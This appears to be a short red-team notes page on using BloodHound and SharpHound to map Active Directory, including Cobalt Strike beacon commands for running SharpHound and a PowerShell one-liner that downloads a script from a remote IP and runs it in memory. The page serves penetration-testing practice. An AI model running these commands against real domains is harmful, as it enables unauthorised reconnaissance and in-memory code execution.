BloodHound

https://github.com/BloodHoundAD/BloodHound

C:\Tools\neo4j\bin\neo4j.bat console

C:\Tools\BloodHound\BloodHound.exe

SharpHound will automatically determine what domain your current user belongs to, find a domain controller for that domain, and start the “default” collection method. The default collection method will collect the following pieces of information from the domain controller:

  • Security group memberships

  • Domain trusts

  • Abusable rights on Active Directory objects

  • Group Policy links

  • OU tree structure

  • Several properties from computer, group and user objects

  • SQL admin links

Additionally, SharpHound will attempt to collect the following information from each domain-joined Windows computer:

  • The members of the local administrators, remote desktop, distributed COM, and remote management groups

  • Active sessions, which SharpHound will attempt to correlate to systems where users are interactively logged on

beacon> execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe

beacon> execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c DcOnly -d cyberbotic.io

PowerShell

IEX (New-Object Net.WebClient).DownloadString('http://192.168.80.128:80/sharp.ps1');
Invoke-NoBlood;
PreviousPowerViewNextLinux Host

Last updated